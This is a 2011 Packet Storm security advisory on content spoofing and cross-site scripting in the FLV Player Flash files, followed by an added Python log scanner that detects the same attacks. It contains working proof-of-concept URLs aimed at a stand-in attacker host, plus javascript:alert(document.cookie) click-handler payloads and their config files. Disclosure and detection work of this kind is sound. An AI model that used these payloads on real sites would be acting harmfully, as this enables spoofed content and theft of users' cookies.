FLV Player Content Spoofing / Cross Site Scripting

2011-08-23T00:00:00
ID PACKETSTORM:104331
Type packetstorm
Reporter MustLive
Modified 2011-08-23T00:00:00

Description

                                        
Hello list!  
  
I want to warn you about Content Spoofing and Cross-Site Scripting  
vulnerabilities in FLV Player.  
  
-------------------------  
Affected products:  
-------------------------  
  
Different versions of FLV Player (MINI, NORMAL, MAXI and MULTI) are  
vulnerable. Note that the NORMAL version ships under the names player_flv.swf  
and player_flv_classic.swf.  
  
The author of FLV Player didn't fix these vulnerabilities.  
  
----------  
Details:  
----------  
  
Content Spoofing (WASC-12):  
  
The Flash files of FLV Player accept arbitrary addresses in the configxml  
parameter, which allows the Flash content to be spoofed, for example by setting  
the address of the configuration file to one on another site.  
  
http://site/player_flv.swf?configxml=http://attacker/1.xml  
  
http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml  
  
http://site/player_flv_multi.swf?configxml=http://attacker/1.xml  
  
The Flash files of FLV Player accept arbitrary addresses in the config  
parameter, which allows the Flash content to be spoofed, for example by setting  
the address of the configuration file to one on another site.  
  
http://site/player_flv.swf?config=http://attacker/1.txt  
  
http://site/player_flv_maxi.swf?config=http://attacker/1.txt  
  
http://site/player_flv_multi.swf?config=http://attacker/1.txt  
  
The Flash files of FLV Player allow all important parameters, including flv  
and startimage, to be spoofed, and in particular accept arbitrary addresses in  
the flv and startimage parameters, which allows the Flash content to be  
spoofed, for example by setting the addresses of the video and image to another  
site. The onclick and ondoubleclick parameters can be used to set links to an  
arbitrary site.  
  
http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg  
  
http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg  
  
http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg  
  
http://site/player_flv_mini.swf?flv=http://attacker/1.flv  
  
XSS (WASC-08):  
  
http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)  
  
http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)  
  
http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)  
  
http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)  
  
http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml  
  
http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml  
  
File xss.xml:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<config>  
<param name="onclick" value="javascript:alert(document.cookie)" />  
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />  
</config>  
  
http://site/player_flv_maxi.swf?config=http://attacker/xss.txt  
  
http://site/player_flv_multi.swf?config=http://attacker/xss.txt  
  
File xss.txt:  
  
onclick=javascript:alert(document.cookie)  
ondoubleclick=javascript:alert(document.cookie)  
  
The code executes after a click (or double click), so this is strictly social  
XSS.  
  
------------  
Timeline:  
------------  
  
2011.02.24 - found these vulnerabilities in different versions of the player  
and informed the owner of the site that used it.  
2011.04.21 - announced at my site.  
2011.04.22 - informed developer.  
2011.08.20 - disclosed at my site.  
  
I mentioned these vulnerabilities on my site  
(http://websecurity.com.ua/5098/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
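Detection logic for the parameters named in the advisory, as an added example that is not part of MustLive's post or of FLV Player: it scans access-log lines for requests to the player SWFs and flags flashvars that point to another host or click handlers that carry a script scheme instead of an http(s) link. The log format, the hostnames and the `check_request`/`scan_log` names are assumptions.

```python
"""Added example: flag FLV Player requests with off-site flashvars or script-scheme click handlers."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

PLAYER_FILES = {"player_flv.swf", "player_flv_classic.swf", "player_flv_mini.swf",
                "player_flv_maxi.swf", "player_flv_multi.swf"}
URL_PARAMS = {"configxml", "config", "flv", "startimage", "onclick", "ondoubleclick"}
HANDLER_PARAMS = {"onclick", "ondoubleclick"}  # the browser follows these on (double) click
SAFE_SCHEMES = {"", "http", "https"}
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def check_request(request_url, site_host):
    """Return (param, reason) findings for one request URL; [] means nothing suspicious."""
    parts = urlsplit(request_url)
    if parts.path.rsplit("/", 1)[-1].lower() not in PLAYER_FILES:
        return []
    findings = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        name = name.lower()
        if name not in URL_PARAMS:
            continue
        for raw in values:
            # parse_qs decoded once; decode again for double encoding and drop whitespace,
            # which browsers ignore inside a scheme ("java script:").
            target = urlsplit("".join(unquote(raw).split()))
            if target.hostname and target.hostname.lower() != site_host.lower():
                findings.append((name, "off-site address " + target.hostname))
            if name in HANDLER_PARAMS and target.scheme not in SAFE_SCHEMES:
                findings.append((name, "script scheme " + target.scheme + ":"))
    return findings


def scan_log(lines, site_host):
    """Run check_request over access-log lines; return [(line_no, findings)] for hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m:
            findings = check_request("http://" + site_host + m.group(1), site_host)
            if findings:
                hits.append((n, findings))
    return hits


# Constructed sample lines (not real traffic): one benign request, three from the advisory.
SAMPLE_LOG = [
    '10.0.0.1 - - [23/Aug/2011:10:00:00 +0000] "GET /player_flv_maxi.swf?flv=1.flv HTTP/1.1" 200 5',
    '10.0.0.2 - - [23/Aug/2011:10:00:01 +0000] "GET /player_flv.swf?configxml=http://attacker/1.xml HTTP/1.1" 200 5',
    '10.0.0.3 - - [23/Aug/2011:10:00:02 +0000] "GET /player_flv_maxi.swf?onclick=javascript:alert(document.cookie) HTTP/1.1" 200 5',
    '10.0.0.4 - - [23/Aug/2011:10:00:03 +0000] "GET /player_flv_mini.swf?flv=http://attacker/1.flv HTTP/1.1" 200 5',
]
```

The same `check_request` can be used server-side to refuse to embed flashvars that fail the check, which is the mitigation when the player itself cannot be patched.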
  